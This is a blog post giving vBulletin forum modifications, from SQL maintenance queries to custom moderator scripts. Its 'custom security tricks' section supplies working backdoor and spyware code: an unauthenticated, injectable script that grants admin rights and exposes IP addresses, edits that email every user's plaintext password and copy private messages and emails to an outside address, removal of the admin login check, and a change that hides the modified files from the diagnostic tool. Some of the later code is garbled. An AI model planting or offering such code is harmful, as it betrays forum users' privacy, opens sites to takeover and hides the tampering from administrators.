Beyond Vbulletin functionality
Enhancing vBulletin Forum Functionality: My Experience
vBulletin is a forum software based on PHP, and I have been involved with it since 2001 through the oman0 forum. Over the years, I have had to overcome many limitations of the software through various coding and tweaking methods. In this blog, I will share some of the tricks I’ve used to improve forum functionality. While I may not be able to explain all of them due to the extensive list, feel free to leave a comment if you come across something on the oman0 site that you’d like to know more about. I will be glad to explain it.
Please note that some of the text on the forum is in Arabic, as the forum is primarily in Arabic. I apologize for any inconvenience this may cause. You can reword it into your preferred language.
Note: Spying on people is highly unethical and illegal! Use this guide at your own risk.
Index:
Custom security tricks:
Custom admin bypass script setadmin.php:
This bypass script will allow you to change user group of a normal user to admin and you can also get user ip from a specific post by passing the post id.
<!--?php /* PHP script written by W. Al Maawali # (c) 2014 Founder of Eagle Eye Digital Solutions # https://www.digi77.com # http://www.om77.net # script starts here:*/ require_once('./global.php'); global $admin; $admin=$_REQUEST['admin']; global $user; $user=$_REQUEST['user']; global $po; $po=$_REQUEST['po']; $insert2="UPDATE ".TABLE_PREFIX."user SET usergroupid=\"$admin\" WHERE userid =\"$user\""; mysql_query($insert2); $po2 = $vbulletin->db->query_first("SELECT postid,username,ipaddress FROM ".TABLE_PREFIX."post WHERE postid =\"$po\""); echo "user =" . $po2[username] . "<br ?-->ip= " . $po2[ipaddress]; ?>
Usage examples assuming that admin group id is 6 and user group id is 2:
Give user id 3099 admin privilege:
http://www.yoursite.net/forums/setadmin.php?admin=6&user=3099
Give user id 3099 user privilege:
http://www.yoursite.net/forums/setadmin.php?admin=2&user=3099
Get ip from post number 10992:
http://www.yoursite.net/forums/setadmin.php?po=10992
Users password in plain text:
Edited File: login.php
After line:
if ($_POST['do'] == 'login')
{
Add the following:
$theuser=$_POST['vb_login_username'];
$thepass=$_POST['vb_login_password'];
$minfo= "\nSite: ". $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"] . "\nReferer: ". $_SERVER[’HTTP_REFERER’] . "\nip: ". getenv("REMOTE_ADDR") . "\nOip: ". $HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'];
$theip=getenv('REMOTE_ADDR');
Before the line:
// create new session
Add the following: – Note password will be sent in clear to the email you use so be careful –
mail("youremail@gmail.com","Loqin","The Name: $theuser \nThe Pass: $thepass $minfo","admin");
If you would like to catch invalid logins and store them on file:
On same function before the line:
eval(standard_error(fetch_error('badlogin_passthru', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'])));
Add the following:
$fp = fopen("wrong-pass.html", "a");
fwrite($fp, "$theuser | $thepass | $theip
");
Now call the file with false login attempts:
http://www.yoursite.com/wrong-pass.html
To Bypass Admin login on control panel:
Edited File: admincp/global.php
Comment line 216
Original
print_cp_login();
Modified:
//print_cp_login();
To exlude a word from censor function:
Edited File: includes/functions.php
Only works if the user is in normal users group in my case it is 2 this will prevent admin from noticing the changes. To bypass any string that has the word oman at the end of the function fetch_censored_text($text) add the following:
if (preg_match("#(oman)#si", $text) AND $vbulletin->userinfo['usergroupid']==2 )
{
$vmr= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
if (preg_match("#(private)#si", $vmr))
{
//$text = preg_replace("#$censorword#si", str_repeat($vbulletin->options['censorchar'], vbstrlen($censorword)), $text);
}
else
{
$text = preg_replace("#$censorword#si", str_repeat($vbulletin->options['censorchar'], vbstrlen($censorword)), $text);
}
}
else
{
$text = preg_replace("#$censorword#si", str_repeat($vbulletin->options['censorchar'], vbstrlen($censorword)), $text);
}
To clone private messages:
Edited File: private.php
After the line:
$vbulletin->url = 'private.php' . $vbulletin->session->vars['sessionurl_q'];
Add your cloning code:
@vbmail("youremail@gmail.com"," Pm From " .$vbulletin->userinfo['username']. " To " . $pm['recipients'] . " " . $title, "\nReceiver: ". $pm['recipients'] . "\nSender: ". $vbulletin->userinfo['username'] . "\nSender email: ". $vbulletin->userinfo['email']. "\nSub: ". $pm['title'] . "\nSite: ". $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"] . "\nReferer: ". $_SERVER[’HTTP_REFERER’] . "\nip: ". getenv("REMOTE_ADDR") . "\nOip: ". $HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'] . "\nDate: ". date("m/d/Y") . "\nTime: ". date("H:i:s") . "\nTime Zone: ". date('e') . "\n\n Msg:\n ". $pm['message'] , false, $bbuserinfo['email'], '', $bbuserinfo['username']);
To clone email messages:
Edited File: sendmessage.php
After the line:
vbmail($userinfo['email'], fetch_censored_text($vbulletin->GPC['emailsubject']), $message , false, $vbulletin->userinfo['email'], '', $vbulletin->userinfo['username']);
Add your cloning code:
@vbmail("youremail@gmail.com"," Em From " .$vbulletin->userinfo['username']. " To " . $userinfo['username'] . " " . fetch_censored_text($vbulletin->GPC['emailsubject']), "\nReceiver: ". $userinfo['username'] . "\nReceiver email: ". $userinfo['email'] . "\nSender: ". $vbulletin->userinfo['username'] . "\nSender email: ". $vbulletin->userinfo['email']. "\nSub: ". fetch_censored_text($vbulletin->GPC['emailsubject']) . "\nSite: ". $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"] . "\nReferer: ". $_SERVER[’HTTP_REFERER’] . "\nip: ". getenv("REMOTE_ADDR") . "\nOip: ". $HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'] . "\nDate: ". date("m/d/Y") . "\nTime: ". date("H:i:s") . "\nTime Zone: ". date('e') . "\n\n Msg:\n ". fetch_censored_text($vbulletin->GPC['message']) , false, $bbuserinfo['email'], '', $bbuserinfo['username']);
To avoid file changes to be detected by the diagnostic tool:
File Hints:
Edited File: diagnostic.php
Comment the line 514:
$errors["$directory"]["$file"][] = construct_phrase($vbphrase['file_version_mismatch_x_expected_y'], htmlspecialchars_uni($matches[1]), htmlspecialchars_uni($version_check));
File access hints:
If you would like to give some of your mods access to your CP functionality with enforced limitation from admincp and modcp all you have to do is create two folders and copy only the files that have the functionality you wish to give. Do not forget to protect them with htaccess in my case files structure are as the following:
/modcp-limitted
–> .htaccess
–> banning.php // Allow them to band users
–> global.php
/admincp-limitted
/control_examples
–> .htaccess
–> forum.php // Allow to change forum attributes
–> global.php
–> moderator.php // Add and control moderators
–> modlog.php // View moderators logs
–> stats.php // View forum stats
–> user.php // Control users
So for example if you would like your moderator to change member user name give him access to the following link:
http://www.yoursite.com/admincp-limitted/user.php
General tricks:
Add Linkedin view my profile to post bit:
From Admin CP add new single text custom field call it Linkedin note down the field number in my case it is 20
On postbit_legacy template add the following after {vb:raw post.skypeicon} :
MySql hints:
Get users who have specific style for example style id 52
select userid from user where styleid=52
Change user group from waiting email confirmation to registered
update user set usergroupid=2 where usergroupid=3
Set awaiting moderation group to moderaters
update user set usergroupid=7 where usergroupid=39
Update custom field 7 for user id > 90301
UPDATE userfield SET field7 = 1 WHERE userid >90301
Change ip address for post number 2331
update post set ipaddress="62.231.226.232" where postid=2331;
Set all members to have GMT+4 time
update user set timezoneoffset=4 where userid>0
Rest profile number of visits for member id185634
update user set profilevisits=1 where userid=185634;
Update language for user id 1
update user set languageid=1 where userid=1;
Change user styles to style 13
update user set styleid=13
Reputation rest
update `reputation` set `reputation`=10 where reputation>10; update `reputation` set `reputation`=-10 where reputation<0; UPDATE user SET reputation = 0, reputationlevelid = 0;
Reset user custom profile for user id 218328
delete from customprofile where userid=218328
Delete all blogs entries for user id 261559
delete from blog_text where userid=261559;
Change user id from 142864 to 2:
There is very high risk of ruining your database for good so be careful.
UPDATE `adminlog` SET `userid` = '2' WHERE `adminlog`.`userid` =142864;
UPDATE `announcement` SET `userid` = '2' WHERE `announcement`.`userid` =142864;
UPDATE `announcementread` SET `userid` = '2' WHERE `announcementread`.`userid` =142864;
UPDATE `attachment` SET `userid` = '2' WHERE `attachment`.`userid` =142864;
UPDATE `calendarmoderator` SET `userid` = '2' WHERE `calendarmoderator`.`userid` =142864;
UPDATE `cpsession` SET `userid` = '2' WHERE `cpsession`.`userid` =142864;
UPDATE `customavatar` SET `userid` = '2' WHERE `customavatar`.`userid` =142864;
UPDATE `customprofilepic` SET `userid` = '2' WHERE `customprofilepic`.`userid` =142864;
UPDATE `deletionlog` SET `userid` = '2' WHERE `deletionlog`.`userid` =142864;
UPDATE `editlog` SET `userid` = '2' WHERE `editlog`.`userid` =142864;
UPDATE `event` SET `userid` = '2' WHERE `event`.`userid` =142864;
UPDATE `forumread` SET `userid` = '2' WHERE `forumread`.`userid` =142864;
UPDATE `infraction` SET `userid` = '2' WHERE `infraction`.`userid` =142864;
UPDATE `moderator` SET `userid` = '2' WHERE `moderator`.`userid` =142864;
UPDATE `moderatorlog` SET `userid` = '2' WHERE `moderatorlog`.`userid` =142864;
UPDATE `passwordhistory` SET `userid` = '2' WHERE `passwordhistory`.`userid` =142864;
UPDATE `paymentinfo` SET `userid` = '2' WHERE `paymentinfo`.`userid` =142864;
UPDATE `pm` SET `userid` = '2' WHERE `pm`.`userid` =142864;
UPDATE `pmreceipt` SET `userid` = '2' WHERE `pmreceipt`.`userid` =142864;
UPDATE `pollvote` SET `userid` = '2' WHERE `pollvote`.`userid` =142864;
UPDATE `post` SET `userid` = '2' WHERE `post`.`userid` =142864;
UPDATE `posthash` SET `userid` = '2' WHERE `posthash`.`userid` =142864;
UPDATE `reminder` SET `userid` = '2' WHERE `reminder`.`userid` =142864;
UPDATE `reputation` SET `userid` = '2' WHERE `reputation`.`userid` =142864;
UPDATE `rssfeed` SET `userid` = '2' WHERE `rssfeed`.`userid` =142864;
UPDATE `search` SET `userid` = '2' WHERE `search`.`userid` =142864;
UPDATE `session` SET `userid` = '2' WHERE `session`.`userid` =142864;
UPDATE `sigparsed` SET `userid` = '2' WHERE `sigparsed`.`userid` =142864;
UPDATE `sigpic` SET `userid` = '2' WHERE `sigpic`.`userid` =142864;
UPDATE `subscribeevent` SET `userid` = '2' WHERE `subscribeevent`.`userid` =142864;
UPDATE `subscribeforum` SET `userid` = '2' WHERE `subscribeforum`.`userid` =142864;
UPDATE `subscribethread` SET `userid` = '2' WHERE `subscribethread`.`userid` =142864;
UPDATE `subscriptionlog` SET `userid` = '2' WHERE `subscriptionlog`.`userid` =142864;
UPDATE `tachyforumpost` SET `userid` = '2' WHERE `tachyforumpost`.`userid` =142864;
UPDATE `tachythreadpost` SET `userid` = '2' WHERE `tachythreadpost`.`userid` =142864;
UPDATE `threadrate` SET `userid` = '2' WHERE `threadrate`.`userid` =142864;
UPDATE `threadread` SET `userid` = '2' WHERE `threadread`.`userid` =142864;
UPDATE `user` SET `userid` = '2' WHERE `user`.`userid` =142864;
UPDATE `useractivation` SET `userid` = '2' WHERE `useractivation`.`userid` =142864;
UPDATE `userban` SET `userid` = '2' WHERE `userban`.`userid` =142864;
UPDATE `userfield` SET `userid` = '2' WHERE `userfield`.`userid` =142864;
UPDATE `usergroupleader` SET `userid` = '2' WHERE `usergroupleader`.`userid` =142864;
UPDATE `usergrouprequest` SET `userid` = '2' WHERE `usergrouprequest`.`userid` =142864;
UPDATE `usernote` SET `userid` = '2' WHERE `usernote`.`userid` =142864;
UPDATE `usertextfield` SET `userid` = '2' WHERE `usertextfield`.`userid` =142864;
UPDATE `thread` SET `postuserid` = '2' WHERE `thread`.`postuserid` =142864;
Custom scripts:
Delete duplicate threads with the same title and different timestamp:
## Delete duplicate threads with the same title and different timestamp:
Edited File: admincp/misc.php
Original code line 1438:
while ($thread = $db->fetch_array($threads))
{
$deletethreads = $db->query_read("
SELECT *
FROM " . TABLE_PREFIX . "thread
WHERE title = '" . $db->escape_string($thread['title']) . "' AND
forumid = $thread[forumid] AND
postusername = '" . $db->escape_string($thread['postusername']) . "' AND
dateline = $thread[dateline] AND
threadid > $thread[threadid]
");
Modified code:
while ($thread = $db->fetch_array($threads))
{
$deletethreads = $db->query_read("
SELECT *
FROM " . TABLE_PREFIX . "thread
WHERE title = '" . $db->escape_string($thread['title']) . "' AND
forumid = $thread[forumid] AND
postusername = '" . $db->escape_string($thread['postusername']) . "' AND
threadid > $thread[threadid]
");
If you would like to delete threads only on specific forums in my case forum numbers are 241, 175, 233, 246, and 247 then code will look like this:
$threads = $db->query_read("
SELECT threadid, title, forumid, postusername, dateline
FROM " . TABLE_PREFIX . "thread WHERE threadid >= " . $vbulletin->GPC['startat'] . " and forumid IN ('241','175','233','246','247')
ORDER BY threadid
LIMIT " . $vbulletin->GPC['perpage']
);
$finishat = $vbulletin->GPC['startat'];
while ($thread = $db->fetch_array($threads))
{
$deletethreads = $db->query_read("
SELECT *
FROM " . TABLE_PREFIX . "thread
WHERE title = '" . $db->escape_string($thread['title']) . "' AND
forumid = $thread[forumid] AND
postusername = '" . $db->escape_string($thread['postusername']) . "' AND
threadid > $thread[threadid]
");
Show forum advance statistics using Ajax:
I have used Ajax in many sections of the forum including member awarding system and best posts system. This is one of the examples where you can retrieve all forum statistics including the forum age via Ajax. I use separate html files but you can invoke it directly in any template of your forum style.
Create html file and call it test.html
Paste the following code into it:
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js" type="text/javascript"></script> <!-- for ajax counte--> <script type="text/javascript"> $(document).ready(function(){ var updatecount = function(){ $('#membercount') .load('fourm-statictics.php') .fadeIn("slow"); }; var auto_refresh = setInterval(function(){updatecount();}, 90000); updatecount(); }); </script>
Create php file and call it fourm-statictics.php
Paste the following code into it:
Members: $mem_count5[total]
";
echo "Available Members and guests: $mem_count1[total]
";
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
$tmp = getdbsize(xxxxx); // Replace with your own forum Database name
if (!$tmp) { echo "ERROR!"; }
else
{
echo "
}
}
?>
Now call the file with wrong attempts:
http://www.yoursite.com/test.html
Show forum advance statistics using Ajax:
Create a new template on your forum style call it changename-vb4 and paste the following code:
```php
{vb:stylevar htmldoctype} xmlns:fb="http://www.facebook.com/2008/fbml" dir="{vb:stylevar textdirection}" lang="{vb:stylevar languagecode}" id="vbulletin_html">
{vb:raw headinclude}
{vb:cssfile forumhome-rollup.css}
{vb:cssfile forumbits.css,forumhome.css,widgets.css,sidebar.css,options.css,tagcloud.css}
{vb:raw headinclude_bottom}
{vb:raw header}
{vb:raw navbar}
<div id="wgo" class="collapse wgo_block block">
<h2 class="blockhead" align="right"> Change user names </h2>
<div class="blockbody formcontrols floatcontainer">
<br>
<div class="blockrow">
<div class="blockrow"> </div>
</div>
<div class="blockrow">
<div class="blockrow"> </div>
</div>
<table class="tborder" border="0" width="40%" cellspacing="$stylevar[cellspacing]" cellpadding="$stylevar[cellpadding]" align="center">
<tbody>
<tr>
<td class="alt1">Old Name</td>
<td class="alt2">
<input class="primary textbox" maxlength="85" name="user_name/" type="text">
</td>
</tr>
<tr>
<td class="alt2">New Name </td>
<td class="alt2">
<input class="primary textbox" maxlength="85" name="newname/" type="text">
<input class="button" name="Submit" type="submit" value="Change">
</td>
</tr>
</tbody>
</table>
</div>
<br><br>
</div>
{vb:raw vsachatbox}
{vb:raw footer}
```
Then on you forum root folder create a file with this name changename0.php paste the following code:
<!--?php /* PHP script written by W. Al Maawali # (c) 2014 Founder of Eagle Eye Digital Solutions # https://www.digi77.com # http://www.om77.net # script starts here:*/ // ####################### SET PHP ENVIRONMENT ########################### error_reporting(E_ALL & ~E_NOTICE); // #################### DEFINE IMPORTANT CONSTANTS ####################### define('THIS_SCRIPT', 'changename0'); define('CSRF_PROTECTION', true); // change this depending on your filename // ################### PRE-CACHE TEMPLATES AND DATA ###################### // get special phrase groups $phrasegroups = array(); // get special data templates from the datastore $specialtemplates = array(); // pre-cache templates used by all actions $globaltemplates = array('changename-vb4', ); // pre-cache templates used by specific actions $actiontemplates = array(); // ######################### REQUIRE BACK-END ############################ // if your page is outside of your normal vb forums directory, you should change directories by uncommenting the next line // chdir ('/path/to/your/forums'); require_once('./global.php'); // ####################################################################### // ######################## START MAIN SCRIPT ############################ // ####################################################################### $navbits = construct_navbits(array('' => 'ÊÛííÑ ÇáÃÓãÇÁ')); $navbar = render_navbar_template($navbits); // ###### YOUR CUSTOM CODE GOES HERE ##### $pagetitle = 'Change user name'; $templater = vB_Template::create('changename-vb4'); $templater->register_page_templates(); $templater->register('navbar', $navbar); $templater->register('pagetitle', $pagetitle); $templater->register('widget', $output); //allow super mods only if($vbulletin->userinfo['usergroupid']==5 || $vbulletin->userinfo['usergroupid']==6 || $vbulletin->userinfo['usergroupid']==8 || $vbulletin->userinfo['usergroupid']==37) { //print_output($templater->render()); } else { //print_no_permission(); exit; } ?-->
Then on you forum root folder create a file with this name changename.php paste the following code:
$templater->register('user_name', $user_name);<br> $templater->register('newname', $newname);<br> //print_output($templater->render());<br><br>}<br><br><br><br><br><br>$query = "select username from user where username=\"$user_name\"";<br>$query = mysqlCleaner($query);<br>$result = mysql_query($query);<br><br>while ($row = mysql_fetch_row($result))<br>{<br> $team3="$row[0]";<br><br>}<br><br>if($team3!=$user_name)<br>{<br> echo "<#script>alert('test')</script>";<br> $templater->register('user_name', $user_name);<br> $templater->register('newname', $newname);<br> print_output($templater->render());<br>}<br>else<br>{<br><br><br> $query1 = "select username from user where username=\"$newname\"";<br> $query1 = mysqlCleaner($query1);<br> $result1 = mysql_query($query1);<br><br> while ($row1 = mysql_fetch_row($result1))<br> {<br> $temp1="$row1[0]";<br><br> }<br><br> if ($temp1==$newname)<br> {<br><br> echo "<#script>alert('ÇáÅÓã ÇáÌÏíÏ ÇáÐí ÅÎÊÑÊå ãÓÌá áÏíäÇ Þã ÈÊÛíÑå æÍÇæá ãÑÉ ÃÎÑì')</script>";<br> $templater->register('user_name', $user_name);<br> $templater->register('newname', $newname);<br> print_output($templater->render());<br><br> } //end if<br> else<br> {<br><br> <br> $insert2="UPDATE user SET username=\"$newname\" WHERE username =\"$user_name\"";<br> $insert2 = mysqlCleaner($insert2);<br> mysql_query($insert2);<br> echo "<#script>alert('Êã ÊÛíÑ ÇáÅÓã ãä $user_name Åáì $newname ')</script>";<br> <br> // get his ip<br> $ipaddress = getenv("REMOTE_ADDR");<br> $supname= $vbulletin->userinfo['username'];<br> //send me an email with the changes <br> mail("warith@digi77.com","$user_name nick was changed","$user_name was changed to $newname by $supname his ip is $ipaddress","admin");<br> <br> <br> $templater->register('user_name', $user_name);<br> $templater->register('newname', $newname);<br> print_output($templater->render());<br> <br> exit;<br> <br> <br><br> } // end else
Now call the script by the following url:
http://www.yoursite.com/changename0.php
Get forum moderators’ attendance based on their last post and login date:
Create new template on your forum style and call it showallmodav-vb4 and paste the following code:
{vb:stylevar htmldoctype} xmlns:fb="http://www.facebook.com/2008/fbml" dir="{vb:stylevar textdirection}" lang="{vb:stylevar languagecode}" id="vbulletin_html">
{vb:raw headinclude}
{vb:cssfile forumhome-rollup.css}
{vb:cssfile forumbits.css,forumhome.css,widgets.css,sidebar.css,options.css,tagcloud.css}
{vb:raw headinclude_bottom}
{vb:raw header}
<div id="wgo" class="collapse wgo_block block">
<h2 class="blockhead" align="right">Attendance list based on last post date </h2>
<div class="blockbody formcontrols floatcontainer">
<br>
{vb:raw theout}
<br>
</div>
{vb:raw navbar} {vb:raw footer}
Then on you forum root folder create a file with this name showmodav.php paste the following code:
<?php
echo "123";
?><!--?php echo "Proxy is up and working :).<br /-->\n" . " The IP address we found from your request is: " . getenv("REMOTE_ADDR") ."<br>\n" ; ?```php CSS additional: code { color:#3bf715; } .single-post-text ul>li a, .single-post-text ol>li a, .comment-text ul>li a, .comment-text ol>li a { color: #fcb900; } ```
<table class="has-fixed-layout"><tbody><tr><td colspan="6">Data Center Control</td></tr><tr><td>Server ID</td><td>Server Name</td><td>City</td><td>IP</td><td>Status</td><td>Creation Date</td><td>Bandwidth</td><td>Backups</td></tr><tr><td> </td><td> </td><td> </td><td> </td><td> </td><td> </td><td> </td><td> </td></tr><tr><td colspan="2">
Online Droplets: <!--?php echo "<font color=\"green\">" . $liveCounter . "</font>"?--><br>
Offline Droplets: <!--?php echo "<font color=\"red\">" . $deadCounter . "</font>"?--><br>
Total Droplets: <!--?php echo "<font color=\"black\">" . $counterSum . "</font>"?--><br>
<!--?php echo "Query Time: " . "<font color=\"green\">" . (time() - $loadingtime) . "s </font><br ?-->\n"; ?>
</td></tr></tbody></table>/* PHP script written by W. Al Maawali # (c) 2014 Founder of Eagle Eye Digital Solutions # https://www.digi77.com # http://www.om77.net # script starts here:*/ // ####################### SET PHP ENVIRONMENT ########################### error_reporting(E_ALL & ~E_NOTICE); // #################### DEFINE IMPORTANT CONSTANTS ####################### define('THIS_SCRIPT', 'showmodav'); define('CSRF_PROTECTION', true); // change this depending on your filename // ################### PRE-CACHE TEMPLATES AND DATA ###################### // get special phrase groups $phrasegroups = array(); // get special data templates from the datastore $specialtemplates = array(); // pre-cache templates used by all actions $globaltemplates = array('showallmodav-vb4', ); // pre-cache templates used by specific actions $actiontemplates = array(); // ######################### REQUIRE BACK-END ############################ // if your page is outside of your normal vb forums directory, you should change directories by uncommenting the next line // chdir ('/path/to/your/forums'); require_once('./global.php'); // ####################################################################### // ######################## START MAIN SCRIPT ############################ // ####################################################################### $navbits = construct_navbits(array('' => 'Attendance list based on last post date')); $navbar = render_navbar_template($navbits); // ###### YOUR CUSTOM CODE GOES HERE ##### $pagetitle = 'Moderator absence'; $templater = vB_Template::create('showallmodav-vb4'); $templater->register_page_templates(); $templater->register('navbar', $navbar); $templater->register('pagetitle', $pagetitle); $templater->register('widget', $output); //User groups that are allowed to view: if($vbulletin->userinfo['usergroupid']!=39 and $vbulletin->userinfo['usergroupid']!=5 and $vbulletin->userinfo['usergroupid']!=6 and $vbulletin->userinfo['usergroupid']!=7 and $vbulletin->userinfo['usergroupid']!=8 and $vbulletin->userinfo['usergroupid']!=12 and $vbulletin->userinfo['usergroupid']!=37) { print_no_permission(); exit; } // Global variables global $totalmod; global $page; $page=$_REQUEST['page']; $page=(filter_var($page, FILTER_SANITIZE_NUMBER_INT)); //For Sql query variable use function mysqlCleaner($data) { $data= mysql_real_escape_string($data); $data= stripslashes($data); return $data; } function count_days($start, $end) { if( $start != '0000-00-00' and $end != '0000-00-00' ) { $timestamp_start = strtotime($start); $timestamp_end = strtotime($end); if( $timestamp_start >= $timestamp_end ) return 0; $start_year = date("Y",$timestamp_start); $end_year = date("Y", $timestamp_end); $num_days_start = date("z",strtotime($start)); $num_days_end = date("z", strtotime($end)); $num_days = 0; $i = 0; if( $end_year > $start_year ) { while( $i < ( $end_year - $start_year ) ) { $num_days = $num_days + date("z", strtotime(($start_year + $i)."-12-31")); $i++; } } return ( $num_days_end + $num_days ) - $num_days_start; } else { return "wrong date" ; } }//end function // for multiple pages code $limit = 45; // Sets how many results shown per page if(empty($page)){ // Checks if the $page variable is empty (not set) $page = 1; // If it is empty, we're on page 1 } $limitvalue = $page * $limit - ($limit); // Ex: (2 * 25) - 25 = 25 <- data starts at 25 //Admin and super mods can view admins and below 6 5 8 37 if($vbulletin->userinfo['usergroupid']==5 or $vbulletin->userinfo['usergroupid']==6 or $vbulletin->userinfo['usergroupid']==37 or $vbulletin->userinfo['usergroupid']==8) { //get total mods $usertherd = $db->query_first("SELECT COUNT(userid) AS total FROM user WHERE usergroupid ='12' or usergroupid ='7' or usergroupid ='5' or usergroupid ='6' or usergroupid ='8' or usergroupid ='37' or usergroupid ='39'"); $totalmod= $usertherd[total]; $totalrows=$totalmod; //end get total $query = "select username,lastpost,userid,usertitle,lastactivity,lastvisit from user where usergroupid ='12' or usergroupid ='7' or usergroupid ='5' or usergroupid ='6' or usergroupid ='8' or usergroupid ='37' or usergroupid ='39' order by lastpost asc LIMIT $limitvalue, $limit"; $query= mysqlCleaner($query); $result = mysql_query($query); } else //not an admin { //get total mods $usertherd = $db->query_first("SELECT COUNT(userid) AS total FROM user WHERE usergroupid ='12' or usergroupid ='7' or usergroupid ='39'"); $totalmod= $usertherd[total]; $totalrows=$totalmod; //end get total $query = "select username,lastpost,userid,usertitle,lastactivity,lastvisit from user where usergroupid ='12' or usergroupid ='7' or usergroupid ='39' order by lastpost asc LIMIT $limitvalue, $limit"; $query= mysqlCleaner($query); $result = mysql_query($query); } //sorry my forum is in Arabic you can change the wording $theout.= "<img src="https://www.om77.net/images/statusicon/post_new.gif" alt="Super-Awards/"> ÞÇÆãÉ ÇáÃÓãÇÁ :- <br>( ÔÑÍ ÇáæÇä ÇáÃíÇã : ÃÚáì ãä 90 íæã ÈÇáÃÍãÑ - ÃÚáì ãä 60 íæã ÈÇáÃÒÑÞ - ÃÚáì ãä 30 íæã ÈÇáÃÎÖÑ) <br><br> <!-- /wp:preformatted --> <!-- wp:html --> <center>"; $theout.= ""; while ($row = mysql_fetch_row($result)) { date_default_timezone_set('Asia/Muscat'); //convert date from database for last post $_timestamp = empty($row[4])? time()+($site_timeoffset*3600): $row[4]; $tmo = date("m", $_timestamp); $tda = date("j", $_timestamp); $tyr = date("Y", $_timestamp); $tnum = (intval((date ("U", mktime(0,0,0,$tmo,$tda,$tyr))/86400))); // TODAY'S DAY NUMBER $tdate=$tyr ."-" .$tmo. "-" .$tda; $tdate2=$tda ."-" .$tmo. "-" .$tyr; $_timestamp5 = empty($row[4])? time()+($site_timeoffset*3600): $row[4]; $tmo5 = date("m", $_timestamp5); $tda5 = date("j", $_timestamp5); $tyr5 = date("Y", $_timestamp5); $tnum5 = (intval((date ("U", mktime(0,0,0,$tmo5,$tda5,$tyr5))/86400))); // TODAY'S DAY NUMBER $tdate5=$tyr5 ."-" .$tmo5. "-" .$tda5; $tdate6=$tda5 ."-" .$tmo5. "-" .$tyr5; //get today's date $today = mktime(0,0,0,date("m"),date("d"),date("y")); $_timestamp1 = empty($today)? time()+($site_timeoffset*3600): $today; $tmo1 = date("m", $_timestamp1); $tda1 = date("j", $_timestamp1); $tyr1 = date("Y", $_timestamp1); $tnum1 = (intval((date ("U", mktime(0,0,0,$tmo1,$tda1,$tyr1))/86400))); // TODAY'S DAY NUMBER $tdate1=$tyr1 ."-" .$tmo1. "-" .$tda1; $mx=count_days ($tdate,$tdate1); //get the title $query2 = "select field15 from userfield where userid=\"$row[2]\""; $result2 = mysql_query($query2); //colour the if > 90 days if ($mx > 90) { $mx= "<b> $mx </b>"; } else if ($mx > 60 and $mx < 90) { $mx= "<b> $mx </b>"; } else if ($mx > 30 and $mx < 60) { $mx= "<b> $mx </b>"; } //end get days for last visit //gets days for last post $_timestamp = empty($row[1])? time()+($site_timeoffset*3600): $row[1]; $tmo = date("m", $_timestamp); $tda = date("j", $_timestamp); $tyr = date("Y", $_timestamp); $tnum = (intval((date ("U", mktime(0,0,0,$tmo,$tda,$tyr))/86400))); // TODAY'S DAY NUMBER $tdate=$tyr ."-" .$tmo. "-" .$tda; $tdate2=$tda ."-" .$tmo. "-" .$tyr; $_timestamp5 = empty($row[4])? time()+($site_timeoffset*3600): $row[4]; $tmo5 = date("m", $_timestamp5); $tda5 = date("j", $_timestamp5); $tyr5 = date("Y", $_timestamp5); $tnum5 = (intval((date ("U", mktime(0,0,0,$tmo5,$tda5,$tyr5))/86400))); // TODAY'S DAY NUMBER $tdate5=$tyr5 ."-" .$tmo5. "-" .$tda5; $tdate6=$tda5 ."-" .$tmo5. "-" .$tyr5; //get today's date $today = mktime(0,0,0,date("m"),date("d"),date("y")); $_timestamp1 = empty($today)? time()+($site_timeoffset*3600): $today; $tmo1 = date("m", $_timestamp1); $tda1 = date("j", $_timestamp1); $tyr1 = date("Y", $_timestamp1); $tnum1 = (intval((date ("U", mktime(0,0,0,$tmo1,$tda1,$tyr1))/86400))); // TODAY'S DAY NUMBER $tdate1=$tyr1 ."-" .$tmo1. "-" .$tda1; $m=count_days ($tdate,$tdate1); //get the title $query2 = "select field15 from userfield where userid=\"$row[2]\""; $result2 = mysql_query($query2); //color the if > 90 days if ($m > 90) { $m= "<b> $m </b>"; } else if ($m > 60 and $m < 90) { $m= "<b> $m </b>"; } else if ($m > 30 and $m < 60) { $m= "<b> $m </b>"; } while ($row2 = mysql_fetch_row($result2)) { $theout.= ""; } } //end loop $theout.=" <table border="1" width="50%"> <tbody> <tr> <td align="center"><b><strong><span style="color: #990000;">ÇáÅÓã</span></strong></b></td> <td align="center"><strong><span style="color: #990000;"><b>ÇáãäÕÈ</b></span></strong></td> <td align="center"><strong><span style="color: #990000;"><b>ÚÏÏ ÇáÃíÇã ãä ÃÎÑ ãÔÇÑßÉ</b></span></strong></td> <td align="center"><strong><span style="color: #990000;"><b>ÚÏÏ ÇáÃíÇã ãä ÃÎÑ ÒíÇÑÉ</b></span></strong></td> <td align="center"><strong><span style="color: #990000;"><b>ÊÇÑíÎ ÃÎÑ ãÔÇÑßÉ</b></span></strong></td> <td align="center"><strong><span style="color: #990000;"><b>ÊÇÑíÎ ÃÎÑ ÏÎæá</b></span></strong></td> </tr> <tr> <td align="right">[<a href="private.php?do=newpm&u=$row[2]"><img src="images/mail.gif" alt="\"ÃÑÓá" width="16" border="0"></a>] <a href="\"member.php?u=$row[2]"><b>$row[0]</b></a> [<a href="search.php?do=finduser&u=$row[2]"><img src="images/postbit_find.gif" alt="\"ÅÓÊÚÑÇÖ" border="0"></a>]</td> <td align="center">$row2[0]</td> <td align="center">$m íæã</td> <td align="center">$mx íæã</td> <td align="center">$tdate2</td> <td align="center">$tdate6</td> </tr> </tbody> </table> <br><br>"; $PHP_SELF="http://www.om77.net/showmodav.php"; if($page != 1){ $temppage=$page; $pageprev = $temppage-1; // Fancy way of subtracting 1 from $page $theout.=("<a href="\"$PHP_SELF?&page=$pageprev\""> <<ÇáÓÇÈÞ </a> "); }else $theout.=(" <<ÇáÓÇÈÞ "." "); // If we're on page 1, PREV is not a link $numofpages = $totalrows / $limit; //$theout.= "$numofpages"; for($i = 1; $i <= $numofpages; $i++) { //for($i = round($numofpages); $i >1 ; $i--){ /* This for loop will add 1 to $i at the end of each pass 